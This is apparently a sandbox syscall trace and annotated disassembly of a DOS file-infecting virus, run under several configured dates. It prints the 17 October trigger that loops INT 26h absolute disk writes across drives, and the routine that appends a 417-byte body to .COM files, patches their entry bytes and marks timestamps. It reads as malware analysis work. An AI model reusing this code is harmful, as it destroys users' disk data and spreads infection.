2018-12-25T11:46:06.179651794Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T11:46:06.191726865Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.195363741Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.206566729Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.214628978Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.223187659Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.224897244Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.227906526Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.232269837Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.234182534Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.237888629Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.25311428Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.261725133Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.273555515Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.277472064Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.289135047Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.297013826Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.305711268Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.30779786Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.310886825Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.31566338Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.31767226Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.321122094Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.323237802Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.338464272Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.351385362Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.354457057Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.367012173Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.374739056Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.381818494Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.384102728Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.387337502Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.391301469Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.393776285Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.397170829Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.399177968Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.408324083Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.419899878Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.423294312Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.436646488Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.444252225Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.451498098Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.453577077Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.457231368Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.460633617Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.462430765Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.467337435Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.469443957Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.477664727Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.489862304Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.492971365Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.504398Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.513456905Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.520711533Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.522519602Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.525524439Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.535901191Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.537889409Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.545652752Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.548744398Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.558012555Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.570206489Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.574436096Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.585967766Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.593749334Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.602069658Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.60440862Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.607395277Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.611161291Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.613960168Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.617291274Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.619302785Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.628947625Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.640872747Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.644160407Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.656157967Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.664213774Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.66705798Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.669750684Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.672282442Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.681459583Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.68409168Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.687386926Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.689290935Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.697946899Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.711196037Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.71424309Z 26 PC: 12c18 | Set disk transfer address (See above)
2018-12-25T11:46:06.715427898Z 9 PC: 12a47 | Display string (String= 'This is a dummy phile for the Spiritual Bruces virus 1.00!')

{"DateBased":true,"Day":1,"Month":10,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2609,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Excerpt following the DOS "Get date" call (INT 21h AH=2Ah returns DH = month, DL = day).
; Date trigger: on 17 October the code enters an INT 26h sector-overwrite loop; on any other date it skips to 0x12b60.
2018-12-25T11:46:06.022397462Z 42 PC: 12b43 | Get date 0x12b43: cmp dh, 0xa  ; month == 10 (October)?
0x12b46: jne 0x12b60  ; no: skip the payload
0x12b48: cmp dl, 0x11  ; day == 17?
0x12b4b: jne 0x12b60  ; no: skip the payload
0x12b4d: mov al, 2  ; INT 26h drive number, 2 = C:
0x12b4f: mov cx, 1  ; one sector per call
0x12b52: lea bx, word ptr [bp + 0x223]  ; DS:BX = source buffer (contents not shown in this trace)
0x12b56: cdq  ; one-byte opcode in 16-bit code, so effectively CWD (DX = sign of AX); presumably DX = 0, the first sector - confirm
0x12b57: int 0x26  ; DOS absolute disk write: AL = drive, CX = sector count, DX = start sector
0x12b59: inc dx  ; next sector; INC leaves CF as INT 26h returned it
0x12b5a: jae 0x12b57  ; CF clear (write succeeded): keep overwriting
0x12b5c: inc al  ; write failed: move on to the next drive
0x12b5e: jmp 0x12b4f  ; no exit from this loop is visible in the excerpt
0x12b60: mov di, 0x100  ; 0x100 = start offset of a .COM image
0x12b63: lea si, word ptr [bp + 0x2a1]  ; presumably the host's saved first three bytes - confirm
0x12b67: movsw word ptr es:[di], word ptr [si]  ; copy bytes 1-2 to es:0x100
0x12b68: movsb byte ptr es:[di], byte ptr [si]  ; copy byte 3
0x12b69: lea dx, word ptr [bp + 0x2a4]  ; DX = buffer handed to the routine below
0x12b6d: call 0x12c14  ; the next logged call is "Set disk transfer address" (PC 12c18), so bp+0x2a4 becomes the DTA
0x12b70: lea dx, word ptr [bp + 0x298]  ; argument for the "Find first file" logged next (likely the search pattern)
2018-12-25T11:46:06.036335124Z 26 PC: 12c18 | Set disk transfer address
2018-12-25T11:46:06.037273783Z 78 PC: 12b7b | Find first file
2018-12-25T11:46:06.042922656Z 67 PC: 12b99 | Get or set file attributes
2018-12-25T11:46:06.059324564Z 61 PC: 12ba2 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:06.064446916Z 63 PC: 12bae | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:46:06.07070426Z 66 PC: 12bb6 | Move file pointer
; Excerpt: tail of the per-file infection sequence, starting at the return from DOS "Get time" (INT 21h AH=2Ch).
; Offsets bp+0x2ba / 0x2bc / 0x2c2 are the time, date and name fields of the find-first DTA set at bp+0x2a4 earlier in the trace.
2018-12-25T11:46:06.0810917Z 44 PC: 12bc5 | Get time 0x12bc5: je 0x12bc1  ; repeat the Get time request while ZF is set (flag source not visible here)
0x12bc7: mov word ptr [bp + 0x11e], dx  ; keep DX from Get time (DH = seconds, DL = hundredths); use not shown, possibly a per-copy key - confirm
0x12bcb: call 0x22b02  ; next logged call is the 417-byte write at PC 12b10; target is probably 0x12b02 with the 16-bit offset left unwrapped - confirm
0x12bce: cdq  ; one-byte opcode in 16-bit code, so effectively CWD: DX = 0 when AX is non-negative
0x12bcf: xor cx, cx  ; CX:DX = file offset, high word 0
0x12bd1: mov ax, 0x4200  ; AH=42h move file pointer, AL=0 relative to start of file
0x12bd4: int 0x21
0x12bd6: lea dx, word ptr [bp + 0x29e]  ; 3-byte buffer; presumably the replacement entry bytes for the host - confirm
0x12bda: mov cx, 3
0x12bdd: mov ah, 0x40  ; AH=40h write CX bytes from DS:DX to handle BX
0x12bdf: int 0x21  ; logged as "Write 3 bytes on handle 5"
0x12be1: mov dx, word ptr [bp + 0x2bc]  ; date word from the DTA (offset 18h)
0x12be5: mov cx, word ptr [bp + 0x2ba]  ; time word from the DTA (offset 16h)
0x12be9: and cl, 0xe0  ; clear the 5-bit seconds/2 field
0x12bec: or cl, 0x15  ; seconds/2 = 21, so the stamp always reads :42 seconds
0x12bef: mov ax, 0x5701  ; AH=57h AL=1: set file date and time
0x12bf2: int 0x21  ; date and hh:mm restored, seconds forced to 42: an indicator on files this code touched
0x12bf4: mov ah, 0x3e  ; AH=3Eh close handle
0x12bf6: int 0x21
0x12bf8: lea dx, word ptr [bp + 0x2c2]  ; DTA offset 1Eh = found file name, for the attribute call logged at PC 12c07
2018-12-25T11:46:06.083370706Z 64 PC: 12b10 | Write file or device (Write 417 bytes on handle 5)
2018-12-25T11:46:06.09221054Z 66 PC: 12bd6 | Move file pointer
2018-12-25T11:46:06.09457939Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:46:06.10138668Z 87 PC: 12bf4 | Get or set file date and time
2018-12-25T11:46:06.103195565Z 62 PC: 12bf8 | Close file
2018-12-25T11:46:06.111305759Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T11:46:06.122623359Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.125142742Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.135179719Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.141839456Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.147925807Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.14921531Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.1514713Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.154102589Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.155307123Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.158328709Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.159856227Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.167128929Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.17766602Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.180324994Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.191078198Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.20347948Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.209663844Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.210954779Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.213549791Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.21627688Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.217530264Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.220518553Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.221880779Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.22893401Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.239006947Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.241469504Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.250845388Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.257795106Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.270721035Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.271917978Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.274934033Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.277964642Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.279619122Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.282925569Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.284405044Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.292395564Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.299561277Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.301380308Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.307628874Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.31241921Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.317646068Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.318666035Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.320841216Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.32274853Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.323998277Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.326262356Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.327744427Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.332590724Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.340354227Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.342948418Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.352403415Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.359469054Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.365549521Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.3669338Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.369924708Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.37806217Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.379556548Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.386419548Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.38801536Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.3964048Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.406627895Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.409584876Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.419115792Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.426322022Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.433028848Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.434485264Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.436873881Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.440662693Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.442223668Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.445172583Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.447123171Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.454350802Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.46906058Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.472041658Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.481455436Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.488530787Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.496940652Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.498202632Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.500739701Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.509678Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.510969834Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.513750082Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.516448392Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.524311615Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.53387889Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.53789559Z 26 PC: 12c18 | Set disk transfer address (See above)
2018-12-25T11:46:06.539035773Z 9 PC: 12a47 | Display string (String= 'This is a dummy phile for the Spiritual Bruces virus 1.00!')

{"DateBased":true,"Day":17,"Month":10,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2609,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Excerpt following the DOS "Get date" call (INT 21h AH=2Ah returns DH = month, DL = day).
; Date trigger: on 17 October the code enters an INT 26h sector-overwrite loop; on any other date it skips to 0x12b60.
; NOTE(review): this run logs no DOS call after Get date, which would fit the INT 26h loop being taken
; (INT 26h is not an INT 21h service) - confirm against the date configured for this run.
2018-12-25T11:46:06.109593249Z 42 PC: 12b43 | Get date 0x12b43: cmp dh, 0xa  ; month == 10 (October)?
0x12b46: jne 0x12b60  ; no: skip the payload
0x12b48: cmp dl, 0x11  ; day == 17?
0x12b4b: jne 0x12b60  ; no: skip the payload
0x12b4d: mov al, 2  ; INT 26h drive number, 2 = C:
0x12b4f: mov cx, 1  ; one sector per call
0x12b52: lea bx, word ptr [bp + 0x223]  ; DS:BX = source buffer (contents not shown in this trace)
0x12b56: cdq  ; one-byte opcode in 16-bit code, so effectively CWD (DX = sign of AX); presumably DX = 0, the first sector - confirm
0x12b57: int 0x26  ; DOS absolute disk write: AL = drive, CX = sector count, DX = start sector
0x12b59: inc dx  ; next sector; INC leaves CF as INT 26h returned it
0x12b5a: jae 0x12b57  ; CF clear (write succeeded): keep overwriting
0x12b5c: inc al  ; write failed: move on to the next drive
0x12b5e: jmp 0x12b4f  ; no exit from this loop is visible in the excerpt
0x12b60: mov di, 0x100  ; 0x100 = start offset of a .COM image
0x12b63: lea si, word ptr [bp + 0x2a1]  ; presumably the host's saved first three bytes - confirm
0x12b67: movsw word ptr es:[di], word ptr [si]  ; copy bytes 1-2 to es:0x100
0x12b68: movsb byte ptr es:[di], byte ptr [si]  ; copy byte 3
0x12b69: lea dx, word ptr [bp + 0x2a4]  ; DX = buffer handed to the routine below
0x12b6d: call 0x12c14  ; other runs on this page log "Set disk transfer address" (PC 12c18) after this call; this run does not
0x12b70: lea dx, word ptr [bp + 0x298]  ; in the other runs this precedes "Find first file" (likely the search pattern)

{"DateBased":true,"Day":1,"Month":10,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2609,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Excerpt following the DOS "Get date" call (INT 21h AH=2Ah returns DH = month, DL = day).
; Date trigger: on 17 October the code enters an INT 26h sector-overwrite loop; on any other date it skips to 0x12b60.
2018-12-25T11:46:06.148878196Z 42 PC: 12b43 | Get date 0x12b43: cmp dh, 0xa  ; month == 10 (October)?
0x12b46: jne 0x12b60  ; no: skip the payload
0x12b48: cmp dl, 0x11  ; day == 17?
0x12b4b: jne 0x12b60  ; no: skip the payload
0x12b4d: mov al, 2  ; INT 26h drive number, 2 = C:
0x12b4f: mov cx, 1  ; one sector per call
0x12b52: lea bx, word ptr [bp + 0x223]  ; DS:BX = source buffer (contents not shown in this trace)
0x12b56: cdq  ; one-byte opcode in 16-bit code, so effectively CWD (DX = sign of AX); presumably DX = 0, the first sector - confirm
0x12b57: int 0x26  ; DOS absolute disk write: AL = drive, CX = sector count, DX = start sector
0x12b59: inc dx  ; next sector; INC leaves CF as INT 26h returned it
0x12b5a: jae 0x12b57  ; CF clear (write succeeded): keep overwriting
0x12b5c: inc al  ; write failed: move on to the next drive
0x12b5e: jmp 0x12b4f  ; no exit from this loop is visible in the excerpt
0x12b60: mov di, 0x100  ; 0x100 = start offset of a .COM image
0x12b63: lea si, word ptr [bp + 0x2a1]  ; presumably the host's saved first three bytes - confirm
0x12b67: movsw word ptr es:[di], word ptr [si]  ; copy bytes 1-2 to es:0x100
0x12b68: movsb byte ptr es:[di], byte ptr [si]  ; copy byte 3
0x12b69: lea dx, word ptr [bp + 0x2a4]  ; DX = buffer handed to the routine below
0x12b6d: call 0x12c14  ; the next logged call is "Set disk transfer address" (PC 12c18), so bp+0x2a4 becomes the DTA
0x12b70: lea dx, word ptr [bp + 0x298]  ; argument for the "Find first file" logged next (likely the search pattern)
2018-12-25T11:46:06.151629751Z 26 PC: 12c18 | Set disk transfer address
2018-12-25T11:46:06.152686398Z 78 PC: 12b7b | Find first file
2018-12-25T11:46:06.159059489Z 67 PC: 12b99 | Get or set file attributes
2018-12-25T11:46:06.174271014Z 61 PC: 12ba2 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:06.180743135Z 63 PC: 12bae | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:46:06.186793872Z 66 PC: 12bb6 | Move file pointer
; Excerpt: tail of the per-file infection sequence, starting at the return from DOS "Get time" (INT 21h AH=2Ch).
; Offsets bp+0x2ba / 0x2bc / 0x2c2 are the time, date and name fields of the find-first DTA set at bp+0x2a4 earlier in the trace.
2018-12-25T11:46:06.188100512Z 44 PC: 12bc5 | Get time 0x12bc5: je 0x12bc1  ; repeat the Get time request while ZF is set (flag source not visible here)
0x12bc7: mov word ptr [bp + 0x11e], dx  ; keep DX from Get time (DH = seconds, DL = hundredths); use not shown, possibly a per-copy key - confirm
0x12bcb: call 0x22b02  ; next logged call is the 417-byte write at PC 12b10; target is probably 0x12b02 with the 16-bit offset left unwrapped - confirm
0x12bce: cdq  ; one-byte opcode in 16-bit code, so effectively CWD: DX = 0 when AX is non-negative
0x12bcf: xor cx, cx  ; CX:DX = file offset, high word 0
0x12bd1: mov ax, 0x4200  ; AH=42h move file pointer, AL=0 relative to start of file
0x12bd4: int 0x21
0x12bd6: lea dx, word ptr [bp + 0x29e]  ; 3-byte buffer; presumably the replacement entry bytes for the host - confirm
0x12bda: mov cx, 3
0x12bdd: mov ah, 0x40  ; AH=40h write CX bytes from DS:DX to handle BX
0x12bdf: int 0x21  ; logged as "Write 3 bytes on handle 5"
0x12be1: mov dx, word ptr [bp + 0x2bc]  ; date word from the DTA (offset 18h)
0x12be5: mov cx, word ptr [bp + 0x2ba]  ; time word from the DTA (offset 16h)
0x12be9: and cl, 0xe0  ; clear the 5-bit seconds/2 field
0x12bec: or cl, 0x15  ; seconds/2 = 21, so the stamp always reads :42 seconds
0x12bef: mov ax, 0x5701  ; AH=57h AL=1: set file date and time
0x12bf2: int 0x21  ; date and hh:mm restored, seconds forced to 42: an indicator on files this code touched
0x12bf4: mov ah, 0x3e  ; AH=3Eh close handle
0x12bf6: int 0x21
0x12bf8: lea dx, word ptr [bp + 0x2c2]  ; DTA offset 1Eh = found file name, for the attribute call logged at PC 12c07
2018-12-25T11:46:06.190688104Z 64 PC: 12b10 | Write file or device (Write 417 bytes on handle 5)
2018-12-25T11:46:06.198489433Z 66 PC: 12bd6 | Move file pointer
2018-12-25T11:46:06.199834959Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:46:06.210209974Z 87 PC: 12bf4 | Get or set file date and time
2018-12-25T11:46:06.21162196Z 62 PC: 12bf8 | Close file
2018-12-25T11:46:06.220057398Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T11:46:06.231008012Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.233555827Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.242823125Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.24875615Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.252595475Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.2535927Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.255684971Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.257511381Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.258394677Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.260893651Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.261882033Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.266468495Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.2762334Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.278701808Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.290304806Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.297624042Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.304100881Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.305469432Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.310750458Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.314080564Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.315529046Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.318628312Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.321126853Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.329141546Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.339186645Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.343093413Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.353133217Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.359796114Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.367149799Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.368804348Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.371189782Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.375307959Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.376703849Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.379351582Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.381478178Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.388721512Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.398208525Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.401348387Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.410793502Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.417098285Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.423943995Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.425454608Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.427747688Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.431653647Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.432924408Z 64 PC: 12be1 | Write file or device (See above)
